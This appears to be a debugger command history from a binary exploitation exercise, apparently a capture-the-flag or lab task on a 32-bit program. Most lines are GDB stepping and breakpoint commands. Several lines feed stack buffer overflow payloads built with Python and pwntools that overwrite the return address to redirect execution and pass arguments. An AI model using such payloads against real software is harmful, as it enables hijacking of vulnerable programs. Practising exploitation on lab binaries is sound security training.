38 lines
663 B
Plaintext
38 lines
663 B
Plaintext
start
|
|
si
|
|
ni
|
|
startni
|
|
ni
|
|
ni
|
|
r < <(python -c "print 'A'*(0x1c+4) + '\xbc\x84\x04\x08'")
|
|
pdisass reader
|
|
b*0x08048678
|
|
r < <(python -c "print 'A'*(0x1c+4) + '\xbc\x84\x04\x08'")
|
|
ni
|
|
r < <(python -c "print 'A'*(0x1c+4) + '\xcb\x84\x04\x08'")
|
|
c
|
|
ls
|
|
start
|
|
si
|
|
ni
|
|
p $eip
|
|
b *$1
|
|
r < <(python -c 'from pwn import *; print "A"*0x20 + p32(0x080484cb)')
|
|
ni
|
|
c
|
|
pdisass reader
|
|
b*0x0804865e
|
|
r < <(python -c 'from pwn import *; print "A"*0x20 + p32(0x080485f9)')
|
|
ni
|
|
si
|
|
ni
|
|
r
|
|
ni
|
|
r < <(python -c 'from pwn import *; print "A"*0x20 + p32(0x080485f9) + "AAAA" + p32(1) + p32(2)')
|
|
ni
|
|
si
|
|
ni
|
|
ni
|
|
c
|
|
r < <(python -c 'from pwn import *; print "A"*0x20 + p32(0x080485f9) + "AAAA" + p32(1) + p32(2)')
|